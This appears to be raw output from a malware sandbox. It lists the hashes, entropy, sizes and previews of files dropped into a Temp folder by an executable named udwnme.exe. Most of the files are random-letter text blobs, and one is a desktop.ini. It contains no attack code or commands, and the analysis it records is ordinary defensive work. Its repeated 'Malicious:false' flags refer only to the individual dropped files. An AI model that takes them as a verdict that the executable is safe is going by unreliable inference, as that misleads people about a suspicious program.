                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                   Preview:
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                   Preview:
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                   Preview:
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.687722658485212
                                                                  Encrypted:false
                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                  Malicious:false
                                                                   Preview:
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.69782189124949
                                                                  Encrypted:false
                                                                  SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                  MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                  SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                  SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                  SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                  Malicious:false
                                                                   Preview:
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.6994061563025005
                                                                  Encrypted:false
                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                  Malicious:false
                                                                   Preview:
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.687722658485212
                                                                  Encrypted:false
                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                  Malicious:false
                                                                   Preview:
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.696250160603532
                                                                  Encrypted:false
                                                                  SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                  MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                  SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                  SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                  SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                  Malicious:false
                                                                   Preview:
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699434772658264
                                                                  Encrypted:false
                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                  Malicious:false
                                                                   Preview:
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.692693183518806
                                                                  Encrypted:false
                                                                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                  MD5:78F042E25B7FAF970F75DFAA81955268
                                                                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                  Malicious:false
                                                                   Preview:
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                   Preview:
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699434772658264
                                                                  Encrypted:false
                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                  Malicious:false
                                                                   Preview:
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.695685570184741
                                                                  Encrypted:false
                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.69782189124949
                                                                  Encrypted:false
                                                                  SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                  MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                  SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                  SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                  SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.694985340190863
                                                                  Encrypted:false
                                                                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.696250160603532
                                                                  Encrypted:false
                                                                  SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                  MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                  SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                  SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                  SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.6994061563025005
                                                                  Encrypted:false
                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):282
                                                                  Entropy (8bit):3.514693737970008
                                                                  Encrypted:false
                                                                  SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
                                                                  MD5:9E36CC3537EE9EE1E3B10FA4E761045B
                                                                  SHA1:7726F55012E1E26CC762C9982E7C6C54CA7BB303
                                                                  SHA-256:4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
                                                                  SHA-512:5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
                                                                  Malicious:false
                                                                   Preview (UTF-16LE with BOM, decoded; the file opens with an empty line):
                                                                   [.ShellClassInfo]
                                                                   LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21769
                                                                   IconResource=%SystemRoot%\system32\imageres.dll,-183
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.694985340190863
                                                                  Encrypted:false
                                                                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                  Malicious:false
                                                                  Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.692693183518806
                                                                  Encrypted:false
